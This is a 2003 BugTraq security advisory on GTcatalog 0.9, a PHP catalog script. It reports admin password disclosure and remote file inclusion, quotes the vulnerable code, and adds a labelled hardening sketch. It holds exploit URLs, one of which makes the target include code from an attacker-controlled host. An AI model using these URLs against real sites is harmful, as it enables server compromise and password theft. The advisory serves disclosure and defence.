BugTraq
GTcatalog (PHP)
Mar 03 2003 02:52PM
Frog Man (leseulfrog hotmail com)
Information :
°°°°°°°°°°°°°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Information Disclosure (Admin Password)
- File Including
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
password.inc :
<?
$globalpw = "[PASSWORD]";
?>
index.php :
------------------------------------------------------------------------
[...]
switch ($function)
{
    case "custom":
        $cc = new Template();
        $cc->set_file("head",$dir_base.$dir_template."header.inc");
        $cc->set_var(array( 'clientcode' => $cfg_clientcode,
                            'title' => $cfg_title." - ".$custom));
        $cc->parse("output","head");
        $cc->p("output");
        include($custom.".custom.inc");
        include ($dir_base.$dir_template."footer.inc");
        break;
[...]
------------------------------------------------------------------------
Exploits :
°°°°°°°°°°
- http://[target]/password.inc
- http://[target]/index.php?function=custom&custom=http://[attacker]/1
with :
http://[attacker]/1.custom.inc
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))
More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/GTcatalog.txt
frog-m@n
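
Added example (not part of the original post, not GTcatalog's code and not the phpsecure.info patch): one way to constrain the value that reaches include() in the "custom" case, so it can only name a *.custom.inc file inside a fixed local directory. CUSTOM_DIR, resolve_custom_page() and the sample inputs are assumptions made for illustration.

```php
<?php
// Hypothetical hardening sketch for index.php's `case "custom":` branch.
const CUSTOM_DIR = __DIR__ . '/custom';   // assumed location of the *.custom.inc files

/** Map the request parameter to a local include path, or return null. */
function resolve_custom_page($custom, string $dir = CUSTOM_DIR): ?string
{
    // Accept only a short plain name: no URL scheme, slashes, dots or NUL bytes.
    if (!is_string($custom) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $custom)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . '/' . $custom . '.custom.inc');
    // realpath() fails for missing files and resolves symlinks, so the
    // prefix check below confines the include to $dir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// In index.php the branch would then read (sketch):
//   $path = resolve_custom_page($_GET['custom'] ?? null);
//   if ($path === null) { http_response_code(404); break; }
//   include $path;

// Constructed demo: a throwaway directory holding one legitimate page.
$dir = sys_get_temp_dir() . '/gtcatalog_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . '/about.custom.inc', "<p>about</p>\n");

// Constructed inputs: a valid name, the remote value from the post,
// a traversal attempt, a missing page and a non-string parameter.
$samples = ['about', 'http://[attacker]/1', '../password', 'missing', ['x']];
foreach ($samples as $s) {
    $r = resolve_custom_page($s, $dir);
    printf("%-26s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES),
           $r === null ? 'rejected' : 'include ' . basename($r));
}

unlink($dir . '/about.custom.inc');
rmdir($dir);
```

The password.inc disclosure needs a separate fix: keep include files outside the document root, or have the web server refuse requests for *.inc.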